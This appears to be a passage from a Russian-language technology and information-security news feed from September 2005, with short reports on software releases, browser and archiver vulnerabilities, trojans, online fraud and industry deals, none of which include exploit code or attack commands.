Представители двух крупнейших в мире ассоциаций, выпускающих кредитные карты, Visa и MasterCard International, заявили, что полностью защитить онлайновые платежи от мошенников в ближайшее время не получится – потребуются сотни миллионов долларов, только чтобы успевать отслеживать и реагировать на новые атаки. Потребители, недовольные высоким уровнем мошенничества с кредитками, и коммерсанты, обеспокоенные количеством расходов на обеспечение безопасности, могут не рассчитывать на скорую победу над хакерами. «Онлайновые мошенники опережают нас во многих областях», - признали шефы отделов безопасности кредитных компаний. Лишним подтверждением этому является постоянный рост числа вирусов, создаваемых преступниками для получения доступа к конфиденциальной информации. Единственным утешением для отечественных компаний является то, что в России самым популярным способом оплаты по-прежнему остаются наличные.
Источник

27/09/2005 11:36 У MSN Search проблемы с релевантностью
Microsoft попросила аналитическую компанию Keynote Systems не обнародовать результаты последнего исследования поисковых систем — они оказались слишком позорны для MSN.com. Опрос среди 2000 пользователей во II кв. 2005 г. показал, что релевантность результатов MSN.com катастрофически упала после того, как эта компания отказалась от сотрудничества с Yahoo! и перешла на собственный поисковый движок в феврале 2005 г. На старом движке MSN.com занимал третье место по релевантности, уступая лишь Google и Yahoo!, а сейчас опустился аж на пятое место. В целом 27% пользователей находят неудовлетворительными результаты общего поиска на MSN.com, а 37% признались, что не могут найти то, что им нужно, с помощью локального поиска. Когда стали известны предварительные результаты исследования, компания Microsoft попросила не публиковать этот отчет, якобы выразив недоверие методологии Keynote Systems. Удивительно, однако Keynote Systems пошла на поводу у Microsoft и согласилась на это. Возможно, причина в том, что Microsoft является одним из крупнейших клиентов Keynote и обеспечивает значительную долю доходов аналитической компании. Однако результаты «секретного исследования» благодаря анонимному источнику в Keynote попали к журналистам влиятельного издания The Wall Street Journal, который без стеснения опубликовал их. Разработка собственного поискового движка MSN.com заняла 20 месяцев и стоила более $100 млн. Результат плачевный: даже по официальной статистике Nielsen/NetRatings во II кв. 2005 г. количество поисковых запросов на портале MSN.com уменьшилось на 4% по сравнению с I кв. 2005 г. По другим данным, количество поисковых запросов уменьшилось на 7%. Но самое страшное, что катастрофически упала релевантность поиска. Количество пользователей, которые считают результаты нерелевантными, увеличилось с 17% до 27% для общего поиска и с 29% до 37% для локального поиска.
Источник

27/09/2005 11:23 "Антивирус Касперского 5.0 для Windows Workstations" модернизирован
"Лаборатория Касперского" выпустила новый пакет обновлений для антивирусного комплекса "Антивирус Касперского 5.0 для Windows Workstations" - Maintenance Pack 3 (MP3). Обновление вносит в программу изменения технологического и процедурного характеров, что улучшает ее функциональные параметры. "Антивирус Касперского 5.0 для Windows Workstations" предназначен для защиты рабочих станций под управлением ОС Windows. Программа отличается простым интерфейсом, предоставляющим пользователю возможность выбора из трех предопределенных уровней защиты: "максимальная защита", "рекомендуемый" и "максимальная скорость". MP3 повышает производительность приложения, оптимизируя ряд ключевых функций. Прежде всего, это возможность формирования списка доверенных процессов, что позволяет исключать из списка защищаемых процессов указанные администратором. Это обеспечивает снижение нагрузки на вычислительные мощности системы. Активизация MP3 также позволяет экономить сетевой трафик и место на диске сервера локального обновления за счет модернизации механизма удаленного обновления антивирусных баз и модулей программы. Теперь, по указанию администратора, система защиты может загружать лишь те компоненты обновлений антивирусных баз и модулей приложения, которые отвечают типу ОС, представленных в сетевой среде бизнес-пользователя.
Источник

27/09/2005 10:57 На OhMyNews подсадили троянца
Известный новостной сайт OhMyNews, где в качестве авторов новостей могут выступать все желающие, оказался источником проблем для многих из его посетителей. Как оказалось, неизвестный злоумышленник взломал сайт и подсадил на него троянца, заражавшего компьютеры каждого, кто логинился к OhMyNews. По сообщению фирмы, занимающейся вопросами интернет-безопасности Geot, взлом произошёл где-то вечером в субботу. Автора троянца, по всей видимости, гражданина Китая, интересовали пароли доступа к онлайновым играм. Троянец устанавливался на компьютеры авторов OhMyNews при входе в систему управления контентом, а когда авторы же логинились к онлайновым играм, воровал ID и пароли. Geot также сообщает, что аналогичным образом был взломан веб-сайт корейского кабельного музыкального канала, и его пользователи тоже оказались под угрозой. По словам одного из авторов блога Techdirt, клавиатурные жучки и троянцы вроде того, которым "оснастили" OhMyNews, - зло всё более распространённое, и, к сожалению, антишпионские программы с ним часто не справляются. Так, например, сам автор Techdirt пострадал от такого троянца, и ему далеко не сразу удалось управиться с ним: из шести антишпионских и антивирусных программ, заразу обнаружили только две, и ни одна не смогла его удалить автоматически.
Lenta.Ru

27/09/2005 10:33 Уязвимость в Internet Explorer
Amit Klein сообщил об обнаружении уязвимости в браузере Internet Exlorer, которая позволяет провести атаку типа HTTP request smuggling и манипулировать определёнными данными на компьютере жертвы. Уязвимость присутствует в функции open() ActiveX объекта "Microsoft.XMLHTTP" и связана с некорректной обработкой входных данных HTTP-запроса. Подобная ошибка может быть использована для внедрения произвольного HTTP-запроса, содержащего знаки табуляции и новой строки. Для проведения успешной атаки необходимо, чтобы HTTP-запрос был послан через сервер или прокси, поддерживающий замену знаков пробела символами табуляции в определённых частях HTTP-запроса. Уязвимость подтверждена в IE6.0 и Microsoft Windows XP SP2 со всем набором патчей. Методов устранения уязвимости на настойщий момент не существует. В качестве временной меры противодействия рекомендуется выставить уровень безопасности браузера в "High". Необходимо отметить, что подобная уязвимость была ранее обнаружена в браузере Firefox, но устранена в текущей версии - 1.0.7.
Описание

27/09/2005 10:09 Palm и Microsoft создали промышленный альянс
Компании Palm и Microsoft, известные как разработчики конкурирующих мобильных платформ, объявили о совместном проекте по производству новой модели смартфона Treo - Treo 700, которая будет работать под управлением мобильной ОС семейства Windows, сообщает Associated Press. По информации агентства, новое устройство поступит на рынок через розничную сеть сотового оператора Verizon Wireless. Некоторые рыночные аналитики отмечают, что это событие сходно по значимости с недавно объявленным переходом компьютеров Apple на процессоры от Intel. Ранее устройства на базе ОС PalmOS доминировали, однако в последние годы мобильные решения на базе Windows занимали все большую часть рынка, и в конце прошлого года маркетинговое исследование авторитетной консалтинговой компании Gartner выявило, что платформа Windows выбилась в лидеры. В мае было объявлено, что Microsoft перестает разделять мобильные ОС на ОС для КПК и для смартфонов - единой мобильной ОС становится Windows Mobile, пятая версия которой была при этом представлена.
Источник

26/09/2005 14:55 KNOPPIX 4.0.2: на LiveCD и LiveDVD
Представлен новый релиз популярнейшего LiveCD-дистрибутива, основанного на Debian GNU/Linux, — KNOPPIX 4.0.2, cообщает nixp.ru. Примечательна эта версия KNOPPIX тем, что она доступна в редакциях как для CD, так и для DVD. В KNOPPIX 4.0.2 обновлена unionfs до 20050921-1507 со стабильными патчами; исправлено: опции загрузки «noeject», «noprompt» и «xdepth=», права доступа на /usr/bin/cdrecord*, проблема с библиотекой knoppix-terminalserver и shutdown-after-NFS-umount, распознавание SCSI-контроллера ATP8*; убрана зависимость glibc от sysvinit, добавлен конвертер «units», обновлена libntfs до CVS-версии, появились обновления безопасности к xserver-xfree86, xlibs, mozilla-firefox; на DVD добавлены: freemind, Debian Anwenderhandbuch V3.0, аудиоплейер amarok (1.2.4).
CD-образ (694МБ)
DVD-образ (3190 МБ)

26/09/2005 14:05 VPN-1 VSX NGX: новый шлюз безопасности от Check Point
Компания Check Point Software Technologies, производитель систем обеспечения безопасности, объявила о выпуске VPN-1 VSX (Virtual System Extension) NGX — новой версии виртуализированного шлюза безопасности. VPN-1 VSX NGX — это интегрированное решение, объединяющее устройство VPN/межсетевой экран, и разработанное для корпоративных заказчиков и поставщиков услуг, которые могут защищать несколько сетей с помощью виртуальных шлюзов безопасности на единой аппаратной платформе. Она поддерживает до 250 таких шлюзов. Эта новая версия была недавно добавлена к платформе NGX. Унифицированная архитектура безопасности NGX нацелена на защиту периметра сети, внутренней сети и веб-приложений. Решение Check Point VPN-1 VSX NGX обеспечивает динамическую маршрутизацию и позволяет обойтись без приобретения дополнительных сетевых устройств. Продукт реализует дополнительную защиту на уровне приложений и поддержку режима виртуального моста — создает прозрачный межсетевой экран, устраняя необходимость реконфигурации сети. VPN-1 VSX NGX можно управлять с использованием единого IP-адреса.Система предлагает заранее определенные шаблоны развертывания и утилиту-мастера, которая упрощает создание виртуальной системы. Решение Check Point VPN-1 VSX NGX стоит от $24 тыс. за 10 виртуальных шлюзов и будет доступно в начале 4 квартала этого года.
Источник

26/09/2005 13:02 Третья редакция списка самых мощных суперкомпьютеров СНГ
Опубликована третья редакция Тор50 рейтинга самых мощных суперкомпьютеров СНГ, cообщает opennet.ru. За полгода с момента публикации предыдущей редакции рейтинг обновился наполовину: в списке появились 24 новые системы; 10 из них разместились в первой и второй десятке списка, причем все новые системы были построены в текущем году. Доля суперкомпьютеров коммерческого использования возросла с 34% до 44%. Суммарная реальная производительность первых пяти систем новой редакции списка превышает суммарную производительность всех 50 систем первой редакции, объявленной в декабре 2004 года. Суммарная реальная производительность всех систем третьей редакции списка Тор50 достигает свыше 18 триллионов операций в секунду. Лидером списка по-прежнему остается кластер МВС-15000ВМ (462 узла, 924 CPU (2xPowerPC 970 2.2 GHz 4 GB RAM), сеть Myrinet/2xGigabit Ethernet), установленный в Межведомственном Суперкомпьютерном Центре РАН. В текущем рейтинге Top500 самых мощных компьютеров мира эта машина заняла 56 место, что является рекордом для вычислительных систем, установленных на территории СНГ. На втором месте по-прежнему лидер первой редакции списка Top50, суперкомпьютер "СКИФ К-1000" (288 узлов, 576 CPU (2xOpteron 248 2.2 GHz 4 GB RAM), сеть InfiniBand/Gigabit Ethernet/СКИФ-ServNet) с реальной производительностью в 2 триллиона операций в секунду. Этот суперкомпьютер был создан год назад в рамках государственной Программы "СКИФ" и вошел в первую сотню мирового рейтинга Тор500. На третьей позиции - новый кластер МСЦ РАН (128 узлов, 256 CPU (2xItanium 2 1.5 GHz 2.048 GB RAM), сеть Myrinet 2000/Gigabit Ethernet/Fast Ethernet) с реальной производительностью в 1,29 триллиона операций в секунду.
Подробности

26/09/2005 12:58 DS Office для студентов
Digital Security объявила о запуске программы лицензирования программных продуктов для высших учебных заведений. Любое государственное высшее учебное заведение теперь может оформить договор на поставку необходимого количестве бесплатных лицензий на Digital Security Office для использования в рамках практических занятий по информационной безопасности.
Источник

26/09/2005 11:38 Набор "заплаток" для Mac OS X
На прошлой неделе Apple выпустила пакет из десятка системных обновлений для Mac OS X, исправляющий в версиях 10.3.9 и 10.4.2 ряд уязвимостей, оцененных экспертами, как критические. Патч может быть загружен с сайта Apple. Специалисты Symantec и FrSirt считают эти уязвимости довольно серьезными и рекомендуют пользователям указанных версий Mac OS X обновить систему как можно скорее. Несмотря на это, по информации распространенной в минувшую пятницу среди подписчиков сервиса DeepSight от Symantec, эксплойтов, использующих данные уязвимостями системы, замечено не было. Однако, непропатченные системы остаются уязвимыми для DoS-атак и при перехвате электронных сообщений. Указанные версии Mac OS X обновлялись уже неоднократно. Самое "крупное" обновление вышло в прошлом месяце и содержало исправления для порядка 44 ошибок в системе. Еще раньше существенные изменения вносились в мае (20 уязвимостей) и марте (более 12) этого года.
Подробности

26/09/2005 11:20 Как латышский хакер президентскую чету "обувал"
На сайте латышской ежедневной газеты "Час" опубликована довольно любопытная статья о хакере (или хакерах), который похитил 3000 латов у супруга Вайры Вике-Фрейберги (президент Латвии) (для справки 1$=0.56 лата). Дело передано в суд. Главный обвиняемый Армандс Бейкманис - на свободе. И это несмотря на то, что на нем еще два крупных дела: о попытке обмануть государство на 176 тысяч латов и о пожертвованиях Союзу зеленых и крестьян. Особую скандальность делу о похищении денег у Иманта Фрейбергса придает вот какой факт. Сумма была похищена через компьютерную сеть с его собственного PC. А сам г-н Фрейбергс, между прочим, является президентом латвийской Ассоциации информационных технологий и телекоммуникаций. То есть, по логике, уж если чей-то компьютер должен был быть защищен от хакеров, так это его... И тем не менее... В конце февраля сего года в компьютер г-на Фрейбергса (находящийся, кстати, в юрмальской резиденции его супруги - президента Вайры Вике-Фрейберги) был запущен «червь», то есть хакерская программа типа worm. Пробравшись через системы защиты, «червь» извлек из данных машины банковские пароли IT -президента и отослал их хакерам. Те, воспользовавшись полученными знаниями, попытались перевести со счета Фрейбергса на свои 20 тысяч латов. Удалось перевести, правда, только 3 тысячи: то ли на счету больше не было, то ли возникли какие-то технические ограничения... Обнаружив грабеж, г-н Фрейбергс известил соответствующие инстанции. Однако о дальнейшем ходе расследования, по его словам, полиция его не извещала. Между тем она работала: буквально пару дней спустя была задержана целая бригада подозреваемых - пять человек. Среди них и Армандс Бейкманис, личность во всех смыслах примечательная. И в каком-то смысле даже VIP . В деле он, по мнению прокуратуры, выполнял роль организатора и руководителя. Но вот удастся ли на сей раз его посадить - большой вопрос.
Более подробно

26/09/2005 10:25 Microsoft готовит многоязычную версию ХР
Microsoft выпустит первую многоязычную версию упрощенной операционной системы Windows XP Starter Edition. Новая версия ОС — уцененная Windows с ограниченной функциональностью, предназначенная для развивающихся стран, — выйдет на ряде новых языков. Кроме девяти индийских языков, в ней впервые поддерживаются английский, на котором также говорят многие миллионы людей в этой стране. Starter Edition предназначена для начинающих пользователей и, кроме Индии, доступна в ряде стран, включая Россию и Малайзию. Индия станет первой страной, получившей специальную многоязычную версию операционной системы. Первая версия Starter Edition появилась в Индии в сентябре прошлого года, а индийскую многоязычную ХР планируется выпустить в начале будущего года. На сегодняшний день во всем мире продано 100 тыс. копий Starter Edition XP.
ZDNet

26/09/2005 10:02 Microsoft разделит рекламу по половому признаку
Корпорация Microsoft представит свою новую систему продажи контекстовой рекламы, которая будет работать в рамках ее интернет-службы MSN, пишет газета The New York Times. Основное отличие этой системы от используемых на сайтах конкурентов состоит в том, что контекстовая реклама от Microsoft учитывает демографическую составляющую, в том числе пол, возраст и местоположение пользователя, пишет издание. Так, если поисковой запрос по слову "розы" проводит мужчина, на странице с результатами поиска он увидит рекламу магазина цветов, если женщина - рекламу магазина, продающего садовые принадлежности. Как предполагается, необходимую информацию о пользователях Microsoft будет получать из данных, отправленных ими при регистрации на других сервисах компании, среди которых - Passport identity service и почта Hotmail. Как предполагается, вначале система пройдет тестирования в Сингапуре и Франции. Ее глобальный запуск намечен на весну 2006 года.
Источник

25/09/2005 12:34 Шпионский учебник для блоггеров
Правозащитная организация "Репортеры без границ" опубликовала настольную книгу "для блоггеров и кибер-диссидентов". Это настоящий справочник по выживанию в экстремальных условиях. Опасаясь репрессий со стороны работодателя или со стороны авторитарного политического режима, зачастую блоггерам приходится скрывать свою личность. Они работают в Сети полностью анонимно и тщательно маскируют любые следы, по которым их можно вычислить. При этом часто именно блоггеры являются единственным достоверным источником информации о том, что происходит в стране или на отдельной фирме. Вполне естественно, что за ними начинается настоящая охота. В некоторых странах, например, в Иране, независимая журналистика существует только в форме блогов. Иранские власти раньше не обращали на нее внимания, но сейчас приступили к активным репрессиям: недавно было арестовано как минимум два десятка блоггеров. В Китае ситуация немногим лучше. Там осуществляется цензура на государственном уровне. Например, в июне блоггерский портал MSN Spaces по требованию властей начал блокировать слова "свобода", "демократия" и "демонстрации" при поисковых запросах из Китая. В этой стране блоггеры обязаны официально регистрировать свои сайты. Справочник, составленный организацией "Репортеры без границ", должен помочь блоггерам. Здесь приводятся практические советы и технические рекомендации относительно того, как сохранить в интернете полную анонимность и обойти цензуру. Для каждой ситуации подходят разные методы - все они описаны. Своим опытом с коллегами делятся блоггеры из Германии, Бахрейна, Ирана, Гонконга, Непала и США.
Источник

25/09/2005 10:30 Новая файловая система, с хранением данных в SQL базе
Анонсирован первый публичный релиз экспериментальной файловой системы NOOFS, cообщает opennet.ru. Особенность данной FS, в использовании в качестве хранилища данных SQL базы, в частности PostgreSQL и MySQL. Функциональность: cоздание единого хранилища данных в сети; расширенные средства управления безопасностью; функции быстрого поиска файла; хранение расширенной информация об элементе ФС; виртуальное управление директориями - папки с динамически формируемым содержимым; встроенные средства по управлению целостностью данных.
Подробности

25/09/2005 10:19 F-Secure и SmartTrust объединились против мобильных вирусов
Антивирус компании F-Secure для мобильных устройств будет внедрен в платформу SmartManage Protect от SmartTrust. Используя её, операторы могут автоматически обновлять программы защиты на КПК и мобильниках абонентов, в частности, сразу после обнаружения уязвимостей в ПО устройств. Тем временем, производитель антивирусов для мобильных устройств SMobile создал первый антивирус для платформы корпоративного беспроводного доступа Blackberry канадской фирмы RIM. Пока в беспроводных сетях масштабные вирусные эпидемии не наблюдались. По прогнозам Gartner, это может произойти не ранее 2007 года, сообщил Inquirer.
Источник

25/09/2005 09:56 Индустрия развлечений предлагает программу, запрещающую файлообмен
Музыкальная и киноиндустрия предоставляет возможность исправиться людям, участвовавшим в обмене через интернет песнями и другими защищенными авторскими правами материалами. Вышедшая в четверг бесплатная программа Digital File Check деинсталлирует или блокирует файлообменные программы на компьютерах пользователей, а также обыскивает системы на наличие музыки и кинофильмов, удаляя любые нелегальные копии. Международная федерация фонографической индустрии (IFPI), лондонский филиал Американской ассоциации индустрии звукозаписи, помогла разработать это ПО вместе с Американской киноассоциацией (MPAA). Организации предназначают программу главным образом для родителей и работодателей в Европе. «Программа Digital File Check проста в применении и помогает людям предотвратить нелегальную загрузку и обмен кинофильмами их сотрудниками, детьми и другими лицами», — говорится в заявлении президента MPAA Дана Гликмана. «Особенно она полезна родителям, желающим приучить своих детей к ответственному наслаждению музыкой через интернет, — говорится в заявлении IFPI. — Она бесплатна и предназначена для добровольного и исключительно частного использования и не передает никаких сведений в антипиратские организации». IFPI объявила также о планах публикации и распространения брошюры для работодателей под названием «Руководство по авторскому праву и безопасности для компаний и государственных учреждений». В этом сочинении очерчивается мера ответственности за содержание корпоративных сетей открытыми для нарушения авторских прав.
Источник

24/09/2005 13:56 В Казахстане хакеры атакуют сайты государственных органов
Около 500 атак хакеров на информационные сети государственных органов Казахстана происходит ежемесячно. Об этом накануне на Евразийском форуме информационной безопасности, заявили представители КНБ республики. Электронные взломщики регулярно пытаются взломать базы данных банков и коммерческих предприятий, чтобы снять крупные суммы денег или получить конфиденциальную информацию. Борьба спецслужб с кибер-преступностью осложняется тем, что и государственные органы, и частные компании зачастую скрывают информацию о нападениях. К тому же, большинство хакеров, совершают электронные налеты из-за рубежа.
Источник

24/09/2005 13:23 ПО IBM защищает данные
Корпорация IBM сообщила о выпуске нового программного обеспечения, предназначенного для непрерывной защиты файлов от вирусов, повреждений и случайного удаления. Предлагаемое ПО IBM Tivoli Continuous Data Protection for Files представляет собой "сеть безопасности данных", которая в реальном времени обеспечивает резервное копирование всевозможной информации – от документов, презентаций и электронных таблиц до MP3-файлов и цифровых фотографий. Проведенные IBM исследования показали, что потеря данных и времени, потраченного на попытки восстановить информацию, является одной из главных проблем, с которой сталкиваются сотрудники компаний, работающие в мобильном режиме. Для реализации IBM Tivoli Continuous Data Protection for Files было разработано более десяти патентованных технологий, применение которых дает возможность вести непрерывную регистрацию изменений данных и планировать выполнение задач удаленного резервного копирования. Новый программный пакет IBM может быть быстро и просто установлен на ноутбуки, настольные компьютеры или корпоративные файловые серверы. Вся процедура состоит из несколько простых шагов – от определения места локального сохранения данных до конфигурирования персональных настроек на удаленном сервере, куда будет направляться копия выбранных файлов. IBM Tivoli Continuous Data Protection for Files за считанные доли секунды создает резервную копию данных на локальной машине и затем, при наличии сетевого подключения, отправляет еще одну копию на удаленный сервер. Таким образом, сотрудники, работающие, например, в мобильном режиме, могут обеспечить защиту важной информации и восстановить поврежденные или удаленные файлы путем возврата к состоянию данных на любой момент времени, даже предшествовавший их потере.
Источник

24/09/2005 12:54 Электронная почта как один из главных источников проблем
Как сообщает аналитическая фирма Osterman Research общая стоимость средств обеспечения безопасности для систем работы с электронными сообщениями составляет от 117,34 долл. за пользователя в год для компаний, насчитывающих менее 2,5 тыс. сотрудников, и до 62,87 долл. в год для компаний, в которых работает 2,5 тыс. и более человек. Таким образом, месячные расходы в расчете на одного пользователя составляют, соответственно, 9,78 долл. и 5,24 долл. Важнейшим аспектом безопасности электронной почты является отсев несанкционированных сообщений рекламного характера. В то время как малые компании в среднем тратят 29,5 часов в неделю (в расчете на 1000 пользователей) на обеспечение безопасности систем электронной почты, 9,1 часа уходит у них на отсев спама. Крупные корпорации тратят на защиту своих служб электронной почты в среднем 15,2 часов в неделю (на 1000 пользователей), при этом блокирование "электронного мусора" занимает у них 4,1 часа. Между тем, эффективное управление электронной почтой подразумевает отнюдь не одну только борьбу со спамом. По данным исследования Messaging Security Market Trends 2005-2008, выпущенного Osterman Research, предприятия вынуждены решать несметное число проблем в данной области. Из 115 опрошенных Osterman компаний, две трети пока не могут реализовать необходимые средства хранения электронных сообщений, и примерно столько же компаний испытывает трудности и с архивированием почты. Около 50 представителей бизнеса сообщили также, что большой размер присоединяемых файлов негативно влияет на производительность их почтовых систем. Однако особую тревогу вызывает тот факт, что почти во всех компаниях, принявших участие в исследовании Osterman, регистрировались случаи заражения компьютеров вирусами или установка вредоносных программам через входящие электронные сообщения.
Подробности

24/09/2005 12:12 Российский Интернет лихорадит
Многие российские пользователи Интернета с вечера пятницы отметили ухудшение связи с зарубежными веб-узлами. Также затруднен доступ к некоторым российским сайтам. Технические специалисты указывают, что маршруты интернет-трафика между Москвой и Санкт-Петербургом начали пролегать через зарубежные сети - в основном, через магистральные каналы скандинавского оператора TeliaSonera. По предварительным данным "Ленты.Ру", проблемы со связью возникли из-за обрыва оптоволоконного кабеля между Москвой и Санкт-Петербургом. По данным сайта московского провайдера NetByNet, поврежденный кабель находится в ведении компании "Элтел". Есть информация о том, что трафик пущен по резервным каналам, но их емкости недостаточно. Некоторые источники говорят о том, что обрыв был устранен, однако проблемы со связью у многих пользователей продолжаются. С представителями компании "Элтел" корреспонденту "Ленты.Ру" связаться не удалось. Другие источники предполагают, что трудности со связью в очередной раз вызваны разногасиями между российскими операторами (подобные случаи уже были в прошлом, и тогда большая часть российского трафика также начинала ходить через зарубежные каналы компании TeliaSonera). О том, когда может быть восстановлена нормальная работа пострадавших сетей передачи данных, пока неизвестно.
Lenta.Ru

24/09/2005 11:14 Компьютерный жаргон сложнее иностранного языка
Офисные работники совершенно не понимают компьютерного жаргона. Для них что IP, что имя хоста — все звучит как иноязычная тарабарщина, из-за чего они очень переживают. Британская консалтинговая служба Computer People провела опрос среди офисных работников и выяснила, что 67% из них чувствуют себя «сбитыми с толку» и «неадекватными» из-за непонимания профессионального IT-жаргона, а 44% признались, что хотели бы улучшить свое знание IT. В общей сложности было опрошено 1000 сотрудников компаний из разных сфер деятельности с целью понять — как можно улучшить коммуникации между IT-персоналом и их коллегами из других отделов. Более половины (56%) опрошенных сказали, что IT-профессионалы «говорят на другом языке», а 40% уверены — компьютерщикам наплевать, что их жаргон смущает обычных пользователей. Возможно, на самом деле компьютерщикам даже приятно использовать непонятные словечки. Ведь те же самые офисные работники и сами любят при случае ввернуть какое-нибудь жаргонное слово, уже из своей области. Этим балуются 85% из них. Опрос также показал, что компьютерный жаргон одинаково непонятен для пользователей любого возраста. Молодежь, хоть и считает себя «продвинутой», но делает ошибки настолько же часто, как и люди старшего поколения. Две трети пользователей хотя бы однажды посылали большие вложения в электронных письмах, которые блокировали почтовую систему получателя. Каждый четвертый офисный сотрудник не способен самостоятельно скачать информацию из интернета. Исследование выяснило, что аналогия — это самый эффективный способ объяснить человеку, как работает та или иная технология.
Подробности

24/09/2005 10:53 Firefox исполняет команды shell из URL
Серьезная ошибка обнаружена в Linux-версиях браузеров Firefox и Mozilla, связанная с обработкой адресов Internet, передаваемых браузеру при запуске из командной строки или при щелчке на них из других приложений, например клиентов электронной почты. Выяснилось, что если внедрить в передаваемый браузеру URL команды shell, заключенные в обратные апострофы, они будут запущены командной оболочкой на исполнение. Ассоциация Mozilla Foundation исправила ошибку в свежевыпущенном браузере Firefox 1.0.7. С ростом количества пользователей "альтернативного" браузера растет и количество выявляемых в нем брешей. Согласно докладу Symantec, опубликованному ею недавно, за первую половину этого года в Firefox было обнаружено вдвое больше уязвимостей, чем в Internet Explorer. В Mozilla Foundation на это возражают, что заплаты для Firefox выпускаются быстрее, чем для IE, и что в общей сложности в браузере Microsoft было найдено больше критических ошибок, чем в Firefox.
Источник

23/09/2005 13:31 Эксплоит уязвимости Firefox
Опубликован эксплоит уязвимости при преобразовании интернациональных имён (IDN) в браузерах, построенных на движках Mozilla (FireFox, Mozilla, Netscape). Напомним, что уязвимость была обнаружена и обнародована Томом Феррисом (www.security-protocols.com) и устранена специальным xpi-патчем от производителя и в недавно вышедших версиях Mozilla и Firefox.
Эксплоит

23/09/2005 12:23 Уязвимость в Internet Explorer
Sven Vetsch из швейцарской компании Scip AG сообщил о наличии неисправленной на настоящий момент уязвимости в браузере Internet Explorer версии 6. Уязвимость типа межсайтовый скриптинг (cross site scripting) связана с особенностью обработки этим браузером графических файлов, в которые внедрён HTML-код. IE обрабатывает подобные файлы, анализируя заголовок файла (например, GIF), обрабатывая оставшееся содержимое сплошным потоком, при этом сам HTML-код обрабатывается встроенным в IE движком обработки HTML. Использование уязвимости позволяет выполнить произвольный код код в системе. Тесты на других браузерах (Mozilla Firefox до 1.0.5, Netscape до 8.0 и Opera) показали, что они не подвержены этой уязвимости. Автор уязвимости связался с компанией m$ ещё 30 июля, однако корпорация не приняла никаких мер для устранения ошибок. Кроме того, автором выпущен PoC, демонстрирующий уязвимость.
Подробности

23/09/2005 11:55 Первый русский журнал об ОС Linux поступил в продажу
В России начинает выходить первый ежемесячный журнал на русском языке, целиком посвященный операционной системе Linux. Это русская версия популярного западного издания Linux Format, который выходит с 2000 года в британском издательстве Future Publishing. Как сообщили «Ленте.Ру» в редакции журнала, на этой неделе он поступил в розничную продажу — его можно найти в компьютерных магазинах и в книжных магазинах с компьютерной литературой. Русские издатели журнала пишут: «Редакционная политика — своевременное и полноценное информирование читательской аудитории о современном состоянии индустрии программного обеспечения с открытым кодом (open source), публикация обзоров о технологических новинках и обучающих программах, новости и интервью». В оригинальном издании традиционно освещается «широкий спектр вопросов от простых (обзоры ПО и детали установки и настройки) до сложных (системное администрирование и программирование под Linux)». Также заявляется, что среди целей журнала — «пропаганда свободного ПО в России, продвижение решений с открытым кодом в бизнес-сообществе, поддержка российского open source-сообщества, организация трибуны для разработчиков свободного ПО и обратная связь между разработчиками и потребителями ПО». Объем журнала — 114 полос, к каждому номеру прилагается DVD-диск, содержащий популярные дистрибутивы Linux/BSD и различные программные пакеты.
Источник

23/09/2005 11:22 Уязвимость в Solaris
Обнаружена уязвимость в ОС Solaris, выпускаемой компанией Sun Microsystems. Уязвимость связана с ошибкой в файловой системе UFS (Unix File System), что может позволить локальному непривилегированному пользователю с возможностью записи ("write") вызвать "подвешивание" ("soft hang") операционной системы. Таким образом, подобная уязвимость может рассматриваться, как локальный DoS. Обнаружена в версиях Solaris 8, 9 на обоих поддерживаемых платформах: SPARC, x86. Производителем выпущены патчи.
Описание

23/09/2005 10:21 Уязвимость в архиваторе 7-Zip
Tan Chew Keong из Secunia Research обнаружил уязвимость в архиваторе 7-Zip, которая связана с некорректной проверкой границ при обработке ARJ-блока размером более 2600 байт. Подобная ситуация может быть использована для вызова ситуации переполнения буфера в стеке при открытии специальным образом сформированного ARJ-файла с дальнейшим выполнением произвольного кода в системе. Уязвимость подтверждаена в версиях 3.13, 4.23, и 4.26 BETA. Устранена в 4.27 BETA.
Описание

23/09/2005 10:05 Хакеры-нацисты атаковали "Википедию"
Неизвестные хакеры взломали популярную онлайновую энциклопедию Wikipedia и «дополнили» информацию об «охотнике за нацистами» Симоне Визентале (Simon Wiesenthal) ложными данными сексуального характера. Это произошло в среду, через день после его смерти. Визенталь, переживший массовое уничтожение евреев во время Второй мировой войны, посвятил свою жизнь поиску и раскрытию нацистских преступников. Он прожил 96 лет и умер во сне во вторник в своем доме в Вене. Сотрудники сайта быстро обнаружили вторжение и уже устранили его последствия. Это второй случай, когда Wikipedia подвергается набегу вандалов. Первой жертвой стал новый Папа римский Бенедикт XVI, фотографию которого заменили на императора из фильма «Звездные войны», сообщил Inquirer.
CNews

23/09/2005 09:41 Вирус для сотовых телефонов перескакивает на ПК
В среду обнаружен «троянский» вирус, который пытается перескочить из смартфонов в ПК — это один из первых случаев «перекрестного заражения» между двумя видами устройств, утверждает секьюрити-фирма F-Secure. Троян Cardtrap.A, атакующий мобильные телефоны с операционной системой Symbian, пытается заразить ПК, когда пользователь вставляет в компьютер карту памяти телефона. Хотя эта угроза считается не очень опасной, так как требует участия пользователя, и к тому же вирус неспособен запускаться на ряде Windows-систем, включая ХР, Cardtrap.A может оказаться предтечей более изощренных вирусов, передающихся от мобильных телефонов компьютерам и наоборот, предупреждает главный научный сотрудник F-Secure Микко Хиппонен. «Мы ожидаем новостей с мобильного фронта, — сказал он. — Возможно, мы увидим Windows-вирусы, переходящие на PDA при их синхронизации с компьютерами или вирусы, перескакивающие из ПК в мобильные телефоны через карту памяти». Cardtrap.A копирует в карту памяти телефона двух червей: Win32/Padobot.Z и Win32/Rays. Когда карта вставлена в ПК, Padobot.Z пытается автоматически запуститься на Windows-компьютере посредством файла autorun.inf. А червь Ray создает на рабочем столе фальшивую системную папку. Кликнув на ней, пользователь выпускает червя в систему. У червя Ray больше шансов заразить ПК, чем у Padobot.Z, так как последний может запускаться только на старых версиях Windows, либо доступ для него будет ограничен всего несколькими типами считывателей карт памяти. Обычно Windows не поддерживает автоматический запуск через карту памяти, что означает, что вирус не может автоматически передаваться из карты памяти в ПК и запускаться в нем. Но в некоторых случаях ПК воспринимает карты памяти как дисковод CD-ROM, и тогда файлы могут запускаться через функцию auto-run.
Подробности

23/09/2005 09:17 Еврокомиссия предлагает план по архивированию всех разговоров и писем европейцев
